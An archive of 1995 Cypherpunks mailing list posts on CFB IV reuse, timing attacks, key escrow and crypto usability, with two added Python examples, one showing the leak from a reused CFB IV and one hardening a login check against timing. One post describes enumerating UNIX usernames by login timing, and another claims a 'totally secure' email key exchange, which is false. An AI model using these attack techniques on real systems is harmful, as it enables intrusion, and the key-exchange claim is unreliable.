> #				Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nina Yuan <nyuan@husc.harvard.edu>
Date: Tue, 12 Dec 1995 05:14:46 +0800
To: owner-cypherpunks@toad.com (Damaged Justice)
Subject: Re: [NOISE] REQ: "Markov" filter as recently posted in .shar form
In-Reply-To: <199512110127.UAA22346@yakko.cs.wmich.edu>
Message-ID: <199512111332.IAA04497@fas.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Apologies, but I already tried all standard net searches on this. Someone
> recently posted a .shar archive for a program called Markov, which filters
[snip]
> also looked on the archives at hks.net, but had no luck there. If some
> kind person will post it again, I'll give it a home on my page of WWW
> resources. I have the binary, and am impressed and amused enough to keep
> it for regular use.. anyone for alt.usenet.kooks.markov? 
> 
> -- 
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
>  EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
>    Hate, hate your enemies  save, save your friends  find, find your place
>  I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.

It was posted by Rich Salz.  In the interest of saving bandwidth, I'll mail
it directly to the requestor, and other interested folks can grab it from
the mentioned home page, FYI.

-nhy
---------------------------------------------------------------------------
Nina H. Yuan    yuan@wjh.harvard.edu   nyuan@fas.harvard.edu  nyuan@bbn.com
"Education is a progressive discovery of our own ignorance."  - Will Durant
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Tue, 12 Dec 1995 05:23:52 +0800
To: cypherpunks@toad.com
Subject: DES Cryptanalysis
Message-ID: <30cc40ff3f57002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for pointers, or perhaps an explanation of the statement
I found in Applied Cryptography (section 9.6) where it implies
that if the IV is not unique in CFB mode, the cryptanalyst can recover the
plaintext.

The reason that this interests me is that I have a file, encrypted
with DES in CFB mode. I believe I know the first 8 bytes of plaintext
and I also know the IV used. While it'd be nice to decrypt this
file, I don't know that it'd be worth brute forcing the key, even if
the spare cycles to do it were available. Any pointers to any pertinent
information would be appreciated. Thanks. 


-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe
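
An added example, not part of the original post: why the IV must be unique per message in CFB mode. Two messages encrypted under the same key and IV share the keystream block E_K(IV), so the XOR of their first ciphertext blocks equals the XOR of their first plaintext blocks. The block function here is an HMAC-based stand-in for DES (CFB only ever uses the encrypt direction), and the key, IVs and messages are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 8  # DES block size in bytes


def block_encrypt(key, block):
    """Stand-in for DES encryption of one 8-byte block (assumption, not DES)."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key, iv, plaintext):
    """Full-block CFB: C_i = P_i XOR E_K(C_{i-1}), with C_0 = IV."""
    out, feedback = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        c = xor(plaintext[i:i + BLOCK], block_encrypt(key, feedback))
        out += c
        feedback = c
    return out


def cfb_decrypt(key, iv, ciphertext):
    """P_i = C_i XOR E_K(C_{i-1}); the feedback is the previous ciphertext block."""
    out, feedback = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out += xor(c, block_encrypt(key, feedback))
        feedback = c
    return out


def first_block_relation(c_a, c_b):
    """What an observer of two ciphertexts can compute without the key."""
    return xor(c_a[:BLOCK], c_b[:BLOCK])


def shared_prefix_blocks(c_a, c_b):
    """Under a reused IV, equal leading plaintext blocks give equal ciphertext blocks."""
    n = 0
    while (n + 1) * BLOCK <= min(len(c_a), len(c_b)) and \
            c_a[n * BLOCK:(n + 1) * BLOCK] == c_b[n * BLOCK:(n + 1) * BLOCK]:
        n += 1
    return n


# Constructed sample values.
KEY = bytes(range(8))
IV_REUSED = b"\x00" * BLOCK
IV_FRESH = b"\x01" * BLOCK
MSG_A = b"ACCOUNT:00012345 BALANCE:0100"
MSG_B = b"ACCOUNT:00012345 BALANCE:9900"
MSG_C = b"TRANSFER 500 TO ACCOUNT 777"

CT_A = cfb_encrypt(KEY, IV_REUSED, MSG_A)
CT_B = cfb_encrypt(KEY, IV_REUSED, MSG_B)   # same IV: the mistake
CT_C = cfb_encrypt(KEY, IV_REUSED, MSG_C)   # same IV, different first block
CT_C_FRESH = cfb_encrypt(KEY, IV_FRESH, MSG_C)

if __name__ == "__main__":
    # Reused IV: ciphertext XOR equals plaintext XOR for the first block.
    print(first_block_relation(CT_A, CT_C) == xor(MSG_A[:BLOCK], MSG_C[:BLOCK]))
    # Reused IV: the shared three-block prefix of MSG_A and MSG_B is visible.
    print(shared_prefix_blocks(CT_A, CT_B))
    # Fresh IV: the relation no longer holds.
    print(first_block_relation(CT_A, CT_C_FRESH) == xor(MSG_A[:BLOCK], MSG_C[:BLOCK]))
```

A single ciphertext with a known IV and known first plaintext block gives only one input/output pair of the block cipher, E_K(IV); the relation above needs a second message under the same key and IV.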




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Tue, 12 Dec 1995 05:43:51 +0800
To: Sean Donelan <SEAN@SDG.DRA.COM>
Subject: Re: Questions for Mark Twain Banks
Message-ID: <199512111455.IAA08213@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:37 AM 12/11/95 -0600, Sean Donelan wrote:
>The St. Louis Internet Users Group is doing a meeting on digital cash
>on Monday, Dec. 11.  Since Mark Twain Banks is located in St. Louis,
>they've been invited to send a few speakers on the topic.

It is probably going to be me...

--Lucky Green

--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 1995 06:50:51 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [NOISE] GAK and self-incrimination?
Message-ID: <199512111401.JAA08705@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 10, 1995 23:55:13, 'Bill Stewart <stewarts@ix.netcom.com>' wrote: 
 
 
 
> 
>Testimony was often compelled by more direct means than threatened 
>contempt citations.  Piling rocks on people until they talked was 
>still in use in the 1600s, unless I've got my dates wrong. 
>It may have gone out of fashion slightly after witch-burning, 
>but was still in recent cultural memory of the Constitution's authors. 
> 
 
The rock process was called "pressing" and it had an economic basis to it,
if my memory serves. 
 
The laws of the time permitted the state (i.e. often the little village) to
confiscate the property of those convicted of crimes in a court. Remember
that many of the witch etc. accusations were made among the residents of
the same villages with all of the petty resentments, vindictive people, and
"nuts" that exist in every location and every time throughout history. 
 
The legal system did not permit someone to be tried for a crime until they
had entered their plea of guilty or not guilty. In other words, you could
charge them with being a witch. Then you demanded that they enter a plea.
Then you try them, and likely convict them. Then you confiscate their
property. People who refused to enter a plea jammed up the entire process --
no plea = no trial = no verdict = no property confiscation. 
 
To avoid this unpleasant series of equations, the forces bringing the
charges wanted a way of forcing people to plead to the charge. They wanted
it to be reasonably safe, since a person who died passed their property on
to the rest of the family. But they also wanted it to be unpleasant enough
to actually compel the accused to actually enter the plea. 
 
Thus pressing was invented. 
 
Stones were slowly added over a period of days to produce maximum
discomfort with minimal chance of an accidental death. 
 
(Now what does this have to do with strong crypto?) 
 
Well, why would the person charged refuse to plead unless they were guilty?
(Beginning to sound a little familiar?) 
 
Futplex's original post brings up yet another example from history where
human behavior has nothing to do with crime. The person who refused to
plead so refused not out of any sense of guilt but from something entirely
different.  
 
If I'm not guilty why do I want strong crypto? Sometimes for the same
reason I want a shredder.  And why do I want a shredder? Sometimes just to
keep the local gossip from going through my papers after I throw them out. 
 
--tallpaul 
      
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 11 Dec 1995 17:12:49 +0800
To: cypherpunks@toad.com
Subject: Timing Cryptanalysis Attack
Message-ID: <199512110845.JAA25564@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



pck@netcom.com (Paul C. Kocher) writes:

 > I've just released details of an attack many of you will
 > find interesting since quite a few existing cryptography
 > products and systems are potentially at risk.  The general
 > idea of the attack is that secret keys can be found by
 > measuring the amount of time used to process messages.

I just read this paper, and while it is somewhat interesting, I
don't think the walls of cryptography are in any danger of
crumbling.

People employing systems like PGP are already advised to use them
on private machines, with only one user, and untampered-with
binaries.  Under such circumstances, the collecting of statistics
necessary to employ a timing attack would be difficult at best,
and anyone doing a "black bag" job on the platform would be
better advised to use a direct attack like a passphrase-sniffer
as opposed to a complex statistical approach.

On networked systems with many users, where one is advised not to
decrypt with or store one's private key, the situation is of
course different.  But again, another user with the ability to
monitor the timing of specific subroutines in one's cryptographic
software or feed that software enough chosen data to generate a
statistical profile of the key, would doubtless have an
opportunity to compromise the system in other ways.

In the particular case of RSA used to sign messages or transmit
session keys, the values being exponentiated are either highly
random or strongly hashed, and the opportunity of an opponent to
time numerical routines with data of his own choosing is
non-existent.

So while this is a very nice piece of work, and certainly of
theoretical interest, I don't think it will modify the way in
which people are advised to utilize cryptographic software, or
cause companies like Netscape or RSADSI to shed any tears.

                                   -Bourbaki 137







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A&SUser <A&SUser@cctr.umkc.edu>
Date: Tue, 12 Dec 1995 05:35:04 +0800
To: cypherpunks@toad.com
Subject: Pornographic stories
Message-ID: <199512111618.IAA06435@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. 
 I'm not sure how you do your Pornographic server, so I'll just ask 
again.  I know I would be VERY grateful if you could send me any XXX 
stories, I love to read them.  I could reward you over the net somehow 
I'm sure.  
my address is mphillips@cctr.umkc.edu

Thanks....I'll be waiting.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Dec 1995 05:09:26 +0800
To: cypherpunks@toad.com
Subject: Re: [Mix-L] WARNING: sting via remailer! (fwd)
In-Reply-To: <DJ5Bun.4Cu@news2.new-york.net>
Message-ID: <Pine.BSF.3.91.951211104124.6709B-100000-100000-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Mutatis Mutantdis wrote:

> Bryan Strawser <bstrawse@copper.ucs.indiana.edu> wrote:
> 
> >Forwarded message:
> [..]
> >> 	I was in the federal building coffee shop in Reston, Va. yesterday
> >> when I overheard a conversation between what appeared to be two FBI agents
> >> discussing a sting operation involving Mixmaster. Hearing the word
> >> "mixmaster" naturally caused my ears to perk up and I listened further. 
> >> 
> >> 	It appears that the FBI has coerced a mixmaster remailer operator
> >> into cooperating with them in a sting operation to catch remailers when
> >> they forward email pertaining to pornography, pedophilia, and copy-written
> >> software. 
> 
> Not that such a thing is impossible, but it seems awfully suspicious
> that FBI agents would be talking about a case within earshot of the
> general public...


I think you are giving the agents too much credit if you believe that 
they never discuss investigations while having coffee in the Federal 
Building -- or even while having lunch at McDonald's.

While sitting in close proximity to other tables, I've had to shush 
agents who were speaking loudly about a case or investigation...

EBD

>  
> --Mutant Rob
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 12 Dec 1995 04:41:18 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: The Elevator Problem
Message-ID: <9512111557.AA09207@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Ok, here was the method of key generation I was talking about.  With the light 
communications, the idea was to use photons whose waves pulsed in certain 
directions (up/down, left/right, and diagonally) to create a way to communicate 
much like Morse code.  The key used to scramble these communications was 
designed to change the direction the photons of a message pulsated - like 
changing the characters of a message, scrambling it up.  The key consisted of 
three symbols, one for each of the possible orientations, and was fairly 
simple. It was like a one time pad in that the key was never recycled.

The key could be generated by a game of 20 questions, so to speak.  The people 
at either end randomly generated a key.  Then, they asked either indirect 
questions about the contents of one another's key (do you have an odd number of 
up/down symbols in row x, etc), but since the contents of the key were never 
touched on DIRECTLY, no eavesdropper could determine the key, and it was 
totally secure.

We, obviously, cannot use the photon as a method of communication, not for 
the masses.  The undertaking of building such a network from scratch is 
astronomical.  However, if one was to use the orientation symbols in one's 
messages, as if they were being beamed, but in an email message instead, one 
could make use of the simple key, and the simple game of '20 questions' to 
generate a totally secure key in a matter of minutes, depending on how long the 
message was and therefore how long the key has to be.  Does any of this make 
sense?

Regards, 
Munster.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 12 Dec 1995 05:59:37 +0800
To: froomkin@law.miami.edu
Subject: Re: NIST GAK export meeting, sv
In-Reply-To: <199512110001.QAA02413@comsec.com>
Message-ID: <9512111605.AA10870@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>CRYPTO: Does anyone recall the cite for a paper a few years that set out a
>way to have escrow agents who would be "oblivious" to the identity of the
>subject of the warrant?  And how would such an escrow agent be sure that
>they were not being duped by the feds? 

AFAIK, Clipper and most of the other systems had escrow agents oblivious to
the identity of the subject of the warrant.  I have seen *no* system which
allows an escrow agent to know it's not being duped by the feds and I
believe I know how to prove that that's not possible.

If you see any such system, please let me know.

BTW, there was Silvio Micali's design which allowed the escrow agents to
verify that they were given the right private key shares without anyone
learning the private key in the process.  That's the only oblivious
mechanism I recall in this business.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Tue, 12 Dec 1995 04:42:24 +0800
To: cypherpunks@toad.com
Subject: Timing attacks
Message-ID: <95Dec11.111045edt.4478@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have had some success using timing against UNIX to find out what usernames
are valid on systems with finger &c disabled.  If a username does not exist,
it returns the "Login incorrect" a lot faster than it would if the username
existed but the password was incorrect.  I wonder how many other systems are
vulnerable to this sort of attack.
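
An added example, not part of the original post: a login check whose work depends on whether the account exists, next to one that does the same work either way. It assumes the timing gap comes from skipping the password hash for unknown usernames; the user table, function names and iteration count are constructed for illustration, and the example counts hash invocations instead of measuring wall-clock time so the result is reproducible.

```python
import hashlib
import hmac
import os

ITERATIONS = 20_000   # kept low so the example runs quickly
kdf_calls = 0         # instrumentation: how many slow hashes a check performed


def kdf(password, salt):
    """The expensive step whose presence or absence shows up in response time."""
    global kdf_calls
    kdf_calls += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_db(users):
    """Build {username: (salt, hash)} from {username: password}."""
    db = {}
    for name, password in users.items():
        salt = os.urandom(16)
        db[name] = (salt, kdf(password, salt))
    return db


def check_leaky(db, user, password):
    """Returns immediately for unknown users: fast 'Login incorrect'."""
    record = db.get(user)
    if record is None:
        return False                      # no hash computed on this path
    salt, stored = record
    return hmac.compare_digest(kdf(password, salt), stored)


# Dummy record hashed against when the username is unknown.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = kdf("placeholder", DUMMY_SALT)


def check_uniform(db, user, password):
    """Always performs one hash and one comparison, whoever is asked about."""
    salt, stored = db.get(user, (DUMMY_SALT, DUMMY_HASH))
    matches = hmac.compare_digest(kdf(password, salt), stored)
    return matches and user in db         # a dummy match never authenticates


def kdf_cost(check, db, user, password):
    """Number of slow hashes one call to `check` performs."""
    global kdf_calls
    kdf_calls = 0
    check(db, user, password)
    return kdf_calls


DB = make_db({"alice": "correct horse", "bob": "battery staple"})  # constructed

if __name__ == "__main__":
    for check in (check_leaky, check_uniform):
        known = kdf_cost(check, DB, "alice", "wrong")
        unknown = kdf_cost(check, DB, "nosuchuser", "wrong")
        print(check.__name__, "known user:", known, "unknown user:", unknown)
```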




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 12 Dec 1995 05:12:18 +0800
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
In-Reply-To: <v02130504acf0c75190a9@[199.125.128.5]>
Message-ID: <9512111614.AA12454@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>So, is this what happened at Crypto AG? Is this what happened at
>Netscape? We may never know for certain, but there is a final
>warning for the folks at Netscape that is buried in the Sun's
>article about Crypto AG:

No it is nothing like what happened at Netscape which was a common or
garden cock up. It was simply the result of miscommunication between
two groups of people being the original and new security team. Taher
et al thought that the random number seed was OK because they discovered 
a design document describing it. Unfortunately the code had not been 
written to implement that design.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 12 Dec 1995 05:54:54 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL cracker...)
In-Reply-To: <199512090815.DAA08976@opine.cs.umass.edu>
Message-ID: <30CC1859.7C84@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Futplex wrote:
> someone quoted:
> Microsoft Knowledge Base article Q102716 says:
> > Storage of the Passwords in the SAM Database
> [...]
> > The second encryption is decryptable by anyone who has access to the
> > double-encrypted password, the user's RID, and the algorithm. The second
> > encryption is used for obfuscation purposes.
> 
> Anyone feel like putting together some sample plaintext/ciphertext pairs ?

This will be really difficult, and in practice rather pointless.  NT does
not allow any user, privileged or not, to gain access to any form (encrypted
or not) of the passwords.  They are stored in a protected area of the system
registry that only the OS itself can access.  The best that you can do is
to ask the OS whether a given username/password pair is valid or not, and it
took until version 3.51 before MS let you do even that!

Of course, rebooting the PC and inspecting the disk with another OS is not
an answer since in any decent environment you will not be able to march up
to the server with a floppy and hit the reset button!


- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Tue, 12 Dec 1995 01:04:45 +0800
Subject: No Subject
Message-ID: <QQztrg26462.199512111704@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


A few years back I ran thru a paper emanating
from a navy labs researcher (I think the name was Peccora)
about using synchronised chaotic signal generators as a
signal scrambling/encryption scheme.

Has there been any kind of progress in this line of work,
practical applications ?

Answer on C4i-pro or directly email to Denholl@ceram.fr

L. Den-Hollander. OIT engineer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 12 Dec 1995 05:33:54 +0800
To: WWW-BUYINFO@ALLEGRA.ATT.COM
Subject: No Subject
Message-ID: <9511118187.AA818709467@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     
     Is the Cafe e-cash system different than Mondex? If so, how?
     Also, does anyone know when the Mondex trial will start in Delaware?
     
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy
     
     David Klur 
     dklur@dttus.com
     
     I am who I am because I say so.  So there. 
     -----END PBP SIGNATURE-------
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 12 Dec 1995 14:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <30CC02F5.4487@netscape.com>
Message-ID: <199512112049.MAA26431@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I for one will probably add a flag for conditional compilation of my
> > bignumber library so that it will take constant time.  This may be a
> > %10 slow down (using small windows exponentiation) which is trivial
> > compared to the %30 speedup I will probably get when I implement a
> > faster mod function :-).
> 
> Careful.  Even if you can make the number of executed instructions the
> same, you still have to worry about timing differences due to branches
> and the way the hardware multiplier handles different operands.

No, he's saying to equalize wall-clock time---just pad out beyond the
largest possible execution time with a timer.  Surely with a sufficient
pad the timing-channel leak can be made negligible (though the author
seems to claim otherwise---I should read the explanation!).

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 12 Dec 1995 05:45:55 +0800
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
Message-ID: <v02130504acf220191b61@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 AM 12/11/95, hallam@w3.org wrote:

>>So, is this what happened at Crypto AG? Is this what happened at
>>Netscape? We may never know for certain, but there is a final
>>warning for the folks at Netscape that is buried in the Sun's
>>article about Crypto AG:
>
>No it is nothing like what happened at Netscape which was a common or
>garden cock up. It was simply the result of miscommunication between
>two groups of people being the original and new security team. Taher
>et al thought that the random number seed was OK because they discovered
>a design document describing it. Unfortunately the code had not been
>written to implement that design.
>
>        Phill

Thanks for the deeper insight. Sure it was probably a mistake. But someone
made the decision to write code that didn't conform to that design document.
That person was probably saying, "Random number generator. Cool. I can use
the standard C library." or whatever. But that person could have been saying,
"Hey, if I slip this in then I'll be able to snag the session
keys with impunity."
We'll never know for sure.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 12 Dec 1995 14:01:08 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512111815.NAA02202@jekyll.piermont.com>
Message-ID: <30CC9B8C.6201@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> The trivial way to handle this is simply to check user time with the
> right system calls and make sure it always comes out the same with an
> appropriate number of sleeps.

The problem with that approach is that if the system is heavily loaded,
it can take an arbitrarily large amount of user time.  Somewhat better
is to sleep for a random amount of time after you're done.  That will
smear out the time distribution making it harder to get a statistically
meaningful number of samples.  It also increases your latency, but
doesn't hurt throughput on a busy system.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Dec 1995 14:13:08 +0800
To: pfarrell@netcom.com (Pat Farrell)
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tPFLA-0008xoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 12/10/95 -0800, you wrote:
>
>NIST Key Export meeting, December 5, 1995 Long version 
>Part 3 of 3.
>
>This covers the notes on agent criteria, and the 
>industry presentations. 
>
[stuff deleted]
>
>Geoff said that they may want legislation support for 
>protecting against illegal release of keys, failure to release, etc.

Pardon me, but since this "key escrow" system was always claimed to be
"voluntary," then how can there be any kind of legal penalties associated
with "failure to release" those keys?


Which raises another question:  Let's suppose I owned a product based on
CKE, and I went to the escrow agent and said, "This escrow is voluntary,
right?  If so, erase my key in your possession."

Not that I'd trust them to do so, but how "voluntary" can a system be if
people can't volunteer out of it?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Tue, 12 Dec 1995 15:05:35 +0800
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <Ikn1ZhGMc50eA2iscn@nsb.fv.com>
Message-ID: <199512112006.NAA15060@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity known as "Tense Hot Alien in Barn" wrote:
>
> This is exactly right.  In fact, it isn't even just bad programmer
> decisions; some of the complexity is really inherently needed for
> security.  PGP's notion of who you trust to certify keys, for example,
> confuses the heck out of naive users, who want to "trust" anyone they
> believe is a good person, not just people they believe are sophisticated
> enough to sign keys.  It's really hard to explain to some people why
> they should say, "No, I don't trust Grandma."
> 
> What a lot of people don't seem to realize is that, in crypto software,
  ***********************************************************************

> there is a fundamental tradeoff between usability and security.  You can
  ***************************************************************

> simplify PGP (or similar software) to the point where it's easy to deal
> with key management, but it will then be far more susceptible to
> compromise.


I'm glad that you are willing to state this opinion,
Nathaniel, and take the flack that you are taking.  I think
that as the goals of cypherpunkism (ewww... I just invented a
new "ism"...) *really* pertain to the *use* of cryptography by
large groups of people-- and not merely to the mathematical
details of cryptography-- that this issue is going to become
overwhelmingly important in the very near future.


I challenge you, however, to go beyond pointing this problem
out and start suggesting some approaches to alleviating it.
With your experience in doing security for a successful 
Internet transaction system, I would hope that you have 
valuable insights which can benefit all of us.


To get to the point, I want to know if this "fundamental 
tradeoff" that you refer to is in fact *fundamental*.  That is
to say: is the product of the "security factor" and the
"usability factor" a constant?  Or are there methods which can
be practically implemented to make strong cryptography easier
for Joe Average to use without exposing Joe to unnecessary
risks?


I'm sure in a trivial sense that there are some such methods.  
For example (to pick on everyone's favorite 
crypto-for-the-masses), if PGP v1 and v2 had come in a nice
menu-oriented shell, or with a nice API, then a hell of a lot
more people would be using PGP now, and without reducing its
effectiveness as far as I can see.  I'm sure that the PGP
guys are aware of this problem, and I am looking forward (as
I'm sure many of us are) to PGP v3 with much anticipation.


But this kind of gooey "user friendliness" is not sufficient 
to make crypto *really* convenient to learn and to use, nor 
is it sufficient to make Joe Average's use of crypto really 
secure.  (Note the extreme sparsity of the current PGP Web O 
Trust, and the oft-lamented weakness of Joe's passphrase.)


I have made a clumsy first shot at envisioning the kind of
strong, convenient crypto that could perhaps bring the 
capabilities that we talk about here to the masses.  
I submitted this article to cpunks last week entitled "My
conception of the ideal encryption tool for the masses", and 
it was picked up by Robert Hettinga and echoed to his e$pam list.  
Unfortunately I have not received a single response to this 
article either in personal mail or in public.  Was my article 
so poorly written?  Or are the cpunks failing to realize the 
importance of the usability/security issue?


I sincerely hope that Nathaniel and others can make progress
in addressing this issue.  Ultimately it will be as important 
as any issue in cryptography.


Regards,

Bryce

P.S.  I just went and re-read "My conception of the ideal
encryption tool for the masses" and I think I failed to make
something clear.  The crypto device that I envision is *not*
just useful for buying a pack of cigarettes at the grocery
store.  I could imagine it being used for *every*
user-authentication purpose.  You sit down at a terminal, plug
your pocket-crypto-box into it, and read your private e-mail.  
You walk into a secure building, pass your pocket-crypto-box 
in front of the infra-red IO device, and the door opens for
you.  You negotiate a million-cyber-credit deal, you plug
your pocket-c'box into the Net, and sign the contract.
Etc. etc.  In short, for the vast majority of your crypto
needs you depend *entirely* upon the pocket-c'box and not upon
passphrases and floppy disks.


P.P.S.  I am aware that this makes a physical attack upon your 
c'box into one of the few remaining viable attacks.  
I recommend that everyone carries a handgun next to their 
pocket c'box.  Deadman switches, good police forces and other
physical security, etc. will also be important.  Since this
technology is empowering individuals, it is also increasing 
the value of loot that can be gained by robbing an individual.
Alley-bash the right person and you might be able to steal a
personal fortune.  Another issue that we who seek a better
future through technology need to address.


P.P.P.S.  I can see that there is a major problem with my idea 
regarding the IO between the pocket-c'box and the user.  
Perhaps the pocket-c'box will have to come with trusted IO 
hardware (screen, keyboard, pointer-device, audio, 
vox-recog...  but I digress...).


P.P.P.P.S.  Also note that the pocket c'box should probably 
hold many of your pseudonyms (i.e., many of your pseudonyms' 
private keys) and your Chaumian pseudonym-exchangeable 
credentials.


P.P.P.P.P.S.  Remember those under-$600.00 netstations?  
Even if they don't pan out this year, they will soon.  And 
then they will move into our pockets, and into our 
wristwatches, etc etc.  The cypherpunks need to be ready to 
offer Joe a *secure* computer to put into his pocket, so 
that he is carrying new capabilities and renewed privacy in 
his pocket, rather than carrying a little chunk of Big 
Brother.



signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <khijol!netcom.com!ecarp@cygnus.com>
Date: Tue, 12 Dec 1995 14:27:46 +0800
To: khijol!ix.netcom.com!stewarts@cygnus.com
Subject: Re: [NOISE] GAK and self-incrimination?
Message-ID: <199512112018.OAA11102@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 09:01:40 -0500
